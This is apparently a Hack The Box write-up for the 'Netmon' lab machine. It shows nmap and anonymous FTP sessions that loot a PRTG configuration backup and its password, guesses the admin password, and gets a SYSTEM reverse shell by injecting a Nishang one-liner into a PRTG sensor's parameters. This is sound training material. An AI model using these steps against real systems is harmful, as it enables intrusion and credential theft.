Netmon - Hack The Box
I think Netmon had the quickest first blood on HTB yet. The user flag could be grabbed by just using anonymous FTP and retrieving it from the user directory. I guessed the PRTG admin password after finding an old backup file and changing the year in the password from 2018 to 2019. Once inside PRTG, I got RCE as SYSTEM by creating a sensor and using Nishang’s reverse shell oneliner.
Summary
- We can log in with anonymous FTP and get the
user.txt
flag directly from the Public user folder - There’s a PRTG configuration backup containing an old password that we can download from FTP
- The PRTG password is the almost the same as the one found in the old backup but it ends with
2019
instead of2018
- We can get RCE using Powershell scripts running as sensors in PRTG
Detailed steps
Nmap scan
The nmap scan shows that anonymous FTP is allowed and that PRTG is running on the webserver.
# nmap -sC -sV -F 10.10.10.152
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 22:43 EST
Nmap scan report for netmon.htb (10.10.10.152)
Host is up (0.0090s latency).
Not shown: 95 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_02-25-19 10:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Free flag from FTP
In the nmap scan, the script identified that the FTP server allows anonymous access. Because we’re not constrained to ftproot
and we can look around the entire disk of the box, I quickly found a user.txt
flag in the c:\users\public
folder.
# ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> cd /users/public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19 07:05AM <DIR> Documents
07-16-16 08:18AM <DIR> Downloads
07-16-16 08:18AM <DIR> Music
07-16-16 08:18AM <DIR> Pictures
02-02-19 11:35PM 33 user.txt
07-16-16 08:18AM <DIR> Videos
226 Transfer complete.
ftp> type binary
200 Type set to I.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
33 bytes received in 0.01 secs (4.5173 kB/s)
ftp> exit
221 Goodbye.
root@ragingunicorn:~/htb/netmon# cat user.txt
dd58c...
I was too slow for first blood, someone else on HTB got user blood in under 2 minutes.
Getting access to PRTG
The PRTG application is running on port 80:
I tried the default credentials prtgadmin
/ prtgadmin
but I got access denied.
Looking in the filesystem, I found that the configuration directory for PRTG is under c:\programdata\paessler
.
ftp> cd /programdata
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19 11:15PM <DIR> Licenses
11-20-16 09:36PM <DIR> Microsoft
02-02-19 11:18PM <DIR> Paessler
I found the configuration file and an old configuration from last year.
ftp> cd "PRTG Network Monitor"
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
[...]
02-25-19 09:54PM 1189697 PRTG Configuration.dat
03-02-19 05:33PM 1198465 PRTG Configuration.old
07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
The PRTG Configuration.dat
config file contains the credentials for user prtgadmin
but they are encrypted (or hashed?) with what seems to be a proprietary method.
When I checked PRTG Configuration.old.bak
, I found the dbpassword: PrTg@dmin2018
I tried this password with user prtgadmin
on the PRTG login page but it didn’t work. Then I realized that this is from a 2018 backup, maybe the admin is lazy and re-used the dbpassword for the admin account and simply used the current date (2019).
My guess was correct and I was able to log in with password PrTg@dmin2019
RCE through PRTG sensors
PRTG is a monitoring tool that supports a whole suite of sensors, like ping, http, snmp, etc. The server itself has been added in the device list, so it’s safe to assume we can add sensors to it:
I clicked add sensor on the 10.10.10.152 server then selected EXE/Script sensor
.
We can’t add powershell custom scripts because we don’t have write access to the application directory, but we can leverage the Parameters
field to add additional code at the end of an existing Powershell script. I used Nishang to get a reverse shell. I added a semi colon at the beginning of the parameters, then pasted the Nishang code after.
After the sensor is created, we hit the play button to execute it.
And we get a shell as nt authority\system
. Box done!
# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.152] 55751
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> type c:\users\administrator\desktop\root.txt
30189...